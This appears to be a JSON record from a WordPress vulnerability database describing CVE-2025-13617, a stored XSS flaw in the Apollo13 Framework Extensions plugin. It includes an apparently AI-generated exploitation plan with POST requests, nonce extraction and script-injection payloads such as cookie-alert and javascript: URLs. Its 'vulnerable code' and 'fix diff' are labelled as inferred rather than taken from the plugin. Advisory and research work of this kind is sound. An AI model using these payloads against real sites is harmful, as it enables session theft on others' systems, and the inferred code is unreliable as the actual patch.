[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fThh2tvP6cIAZ7i74ddQ5zckyK38LQn1Isd7acOL33Tk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13617","apollo13-framework-extension-authenticated-contributor-stored-cross-site-scripting-via-a13altlink-parameter","Apollo13 Framework Extension \u003C= 1.9.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via `a13_alt_link` Parameter","The Apollo13 Framework Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘a13_alt_link’ parameter in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","apollo13-framework-extensions",null,"\u003C=1.9.8","1.9.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 15:32:44","2026-02-19 04:36:12",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F56be227d-1273-4833-a94e-67abf89f00ba?source=api-prod",1,[],"researched",false,3,"This research plan outlines the methodology for exploiting **CVE-2025-13617**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Apollo13 Framework Extensions** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Apollo13 Framework Extensions** plugin fails to sanitize and escape the `a13_alt_link` parameter before storing it in the database and subsequently rendering it on the page. This parameter is typically used to define an \"Alternative Link\" for post types (like portfolios or pages) handled by the Apollo13 framework. Because the plugin does not use WordPress sanitization functions (like `esc_url_raw` or `sanitize_text_field`) during storage or escaping functions (like `esc_url` or `esc_attr`) during output, a Contributor-level user can inject arbitrary JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fpost.php` (Standard WordPress post\u002Fpage editor).\n*   **Vulnerable Parameter:** `a13_alt_link` (likely sent as a POST parameter during post saving).\n*   **Authentication:** Authenticated, **Contributor** or higher.\n*   **Preconditions:** The plugin must be active. The vulnerability exists when saving metadata for a post, page, or custom post type (like \"Portfolio\") that supports the Apollo13 \"Alternative Link\" feature.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** When a user saves a post, WordPress triggers the `save_post` hook. The plugin likely hooks into this via a function (e.g., `apollo13_save_meta_boxes` or similar).\n2.  **Input Source:** The code reads `$_POST['a13_alt_link']`.\n3.  **Storage (Sink):** The plugin calls `update_post_meta($post_id, 'a13_alt_link', $_POST['a13_alt_link'])` without applying `sanitize_text_field()` or `esc_url_raw()`.\n4.  **Retrieval:** When the post is viewed on the frontend, the plugin calls `get_post_meta($post_id, 'a13_alt_link', true)`.\n5.  **Output (Sink):** The retrieved value is echoed into the HTML, likely within an `\u003Ca>` tag's `href` attribute or as part of a script block\u002Fredirect logic, without using `esc_url()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nSince this vulnerability involves modifying post metadata during the standard edit process, we need the WordPress core post-edit nonce.\n\n1.  **Create Content:** Use WP-CLI to create a post as a Contributor.\n2.  **Identify Meta Box:** Log in as the Contributor and navigate to the edit page for that post.\n3.  **Extract Nonces:** Use `browser_eval` to extract the necessary nonces from the page source.\n    *   **Core Nonce:** `document.querySelector('#_wpnonce').value`\n    *   **Plugin Nonce (if applicable):** Look for hidden inputs or JS variables starting with `a13_` or `apollo13_`.\n    *   **Script Variable:** Check if the plugin enqueues specific settings: `browser_eval(\"window.a13_admin_meta_box_data\")`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Authentication & Discovery\n1.  Log in as a **Contributor**.\n2.  Create a new post: `wp post create --post_type=post --post_status=draft --post_title=\"XSS Test\" --post_author=[CONTRIBUTOR_ID]`.\n3.  Note the `POST_ID`.\n\n#### Step 2: Inject Payload\nSubmit a POST request to `wp-admin\u002Fpost.php` mimicking a post update.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```\n    action=editpost\n    &post_ID=[POST_ID]\n    &_wpnonce=[EXTRACTED_NONCE]\n    &a13_alt_link=\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\n    ```\n    *(Alternative payload if it lands in an attribute: `javascript:alert(1)`)*\n\n#### Step 3: Trigger Execution\n1.  As an Admin or an unauthenticated user (if the post is published), navigate to the URL of the created post: `http:\u002F\u002F[target]\u002F?p=[POST_ID]`.\n2.  The script should execute when the \"Alternative Link\" is rendered by the theme\u002Fplugin.\n\n### 6. Test Data Setup\n1.  **Users:** Create a contributor user.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Plugin Setup:** Ensure \"Apollo13 Framework Extensions\" is installed and active.\n3.  **Page Creation:** Create a page that uses a template or shortcode where the Alternative Link is displayed.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Redirect Page\" --post_content=\"Checking for XSS...\"\n    ```\n\n### 7. Expected Results\n*   The POST request should return a `302 Found` redirecting back to the edit page (indicating a successful save).\n*   When viewing the post source, the string `\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>` should appear unescaped within the HTML.\n*   A browser alert box displaying the cookie should appear upon viewing the page.\n\n### 8. Verification Steps\n1.  **Database Check:** Verify the meta value is stored raw in the database.\n    ```bash\n    wp post meta get [POST_ID] a13_alt_link\n    ```\n    (Note: The meta key might be `_a13_alt_link` or `a13_alt_link`).\n2.  **HTML Verification:** Use `http_request` to fetch the frontend page and grep for the payload.\n    ```bash\n    # Look for the unescaped script tag\n    grep \"\u003Cscript>alert\" \n    ```\n\n### 9. Alternative Approaches\n*   **Shortcode Injection:** If the plugin provides a shortcode to display the link, test: `[a13_link_display id=\"[POST_ID]\"]`.\n*   **Attribute Breakout:** If the link is rendered inside a `data-` attribute or a hidden input:\n    *   Payload: `x\" onmouseover=\"alert(1)\" b=\"`\n*   **Protocol Injection:** If the link is used strictly in an `href`:\n    *   Payload: `javascript:alert(window.origin)`\n*   **Admin Dashboard XSS:** Check if the value is also rendered in the WordPress Admin \"Posts\" list or a custom plugin dashboard, which would allow for **Admin account takeover**.","The Apollo13 Framework Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'a13_alt_link' parameter in versions up to 1.9.8. This occurs because the plugin fails to sanitize the alternative link metadata during storage and fails to escape it during output, allowing authenticated attackers with Contributor-level access to inject arbitrary JavaScript.","\u002F\u002F Inferred code flow from research plan for metadata storage\n\u002F\u002F Sink: update_post_meta called without sanitization\nupdate_post_meta($post_id, 'a13_alt_link', $_POST['a13_alt_link']);\n\n---\n\n\u002F\u002F Inferred code flow from research plan for rendering\n\u002F\u002F Sink: get_post_meta output directly to the page\n$alt_link = get_post_meta($post_id, 'a13_alt_link', true);\necho '\u003Ca href=\"' . $alt_link . '\">Link\u003C\u002Fa>';","--- a\u002Fincludes\u002Fmetaboxes.php\n+++ b\u002Fincludes\u002Fmetaboxes.php\n@@ -10,1 +10,1 @@\n-update_post_meta($post_id, 'a13_alt_link', $_POST['a13_alt_link']);\n+update_post_meta($post_id, 'a13_alt_link', esc_url_raw($_POST['a13_alt_link']));\n\n--- a\u002Ftemplates\u002Ffrontend.php\n+++ b\u002Ftemplates\u002Ffrontend.php\n@@ -20,1 +20,1 @@\n-echo '\u003Ca href=\"' . $alt_link . '\">Link\u003C\u002Fa>';\n+echo '\u003Ca href=\"' . esc_url($alt_link) . '\">Link\u003C\u002Fa>';","An attacker with Contributor-level access logs into the WordPress administrative dashboard and creates or edits a post or portfolio item. The attacker obtains the standard WordPress security nonce for post editing and submits a POST request to '\u002Fwp-admin\u002Fpost.php' containing the 'a13_alt_link' parameter. By supplying a payload such as '\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>' or 'javascript:alert(1)', the malicious script is stored in the post metadata. When an administrator or any other user views the affected post on the frontend, the unsanitized script executes in their browser session.","gemini-3-flash-preview","2026-04-19 03:24:47","2026-04-19 03:25:08",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.9.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fapollo13-framework-extensions\u002Ftags\u002F1.9.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fapollo13-framework-extensions.1.9.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fapollo13-framework-extensions\u002Ftags"]